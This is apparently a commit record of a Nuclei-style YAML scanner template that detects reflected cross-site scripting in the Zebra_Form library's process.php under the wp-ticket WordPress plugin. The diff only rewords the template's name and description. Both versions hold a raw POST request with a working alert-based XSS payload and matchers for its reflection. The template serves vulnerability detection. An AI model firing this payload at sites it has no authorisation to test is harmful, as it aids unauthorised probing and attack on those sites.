vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml (before)
id: wordpress-zebra-form-xss

info:
  name: Zebra_Form Library <= 2.9.8 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: |
    Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities in its process.php file.
  reference:
    - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
    - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp,wpscan

requests:
  - raw:
      - |
        POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
        Origin: null

        -----------------------------77916619616724262872902741074
        Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
        Content-Type: text/plain
        Test
        -----------------------------77916619616724262872902741074--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><img src onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml (after)
id: wordpress-zebra-form-xss

info:
  name: Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting
  author: madrobot
  severity: medium
  description: |
    Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php.
  reference:
    - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
    - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:N
    cvss-score: 7.2
    cwe-id: CWE-79
  tags: wordpress,xss,wp,wpscan

requests:
  - raw:
      - |
        POST /wp-content/plugins/wp-ticket/assets/ext/zebraform/process.php?form=%3C/script%3E%3Cimg%20src%20onerror=alert(document.domain)%3E&control=upload HTTP/1.1
        Host: {{Hostname}}
        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
        Content-Type: multipart/form-data; boundary=---------------------------77916619616724262872902741074
        Origin: null

        -----------------------------77916619616724262872902741074
        Content-Disposition: form-data; name="upload"; filename="{{randstr}}.txt"
        Content-Type: text/plain
        Test
        -----------------------------77916619616724262872902741074--

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "</script><img src onerror=alert(document.domain)>"

      - type: word
        part: header
        words:
          - "text/html"

      - type: status
        status:
          - 200

# Enhanced by mp on 2022/09/07

vulnerabilities/wordpress/wordpress-zebra-form-xss.yaml (diff)
@@ -1,11 +1,11 @@
 id: wordpress-zebra-form-xss
 
 info:
-  name: Zebra_Form Library <= 2.9.8 - Cross-Site Scripting
+  name: Zebra_Form PHP Library <= 2.9.8 - Cross-Site Scripting
   author: madrobot
   severity: medium
   description: |
-    Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities in its process.php file.
+    Zebra_Form PHP library 2.9.8 and prior (which is used by some WordPress plugins) is affected by reflected cross-site scripting vulnerabilities via process.php.
   reference:
     - https://blog.wpscan.com/2021/02/15/zebra-form-xss-wordpress-vulnerability-affects-multiple-plugins.html
     - https://wpscan.com/vulnerability/e4b796fa-3215-43ff-a6aa-71f6e1db25e5
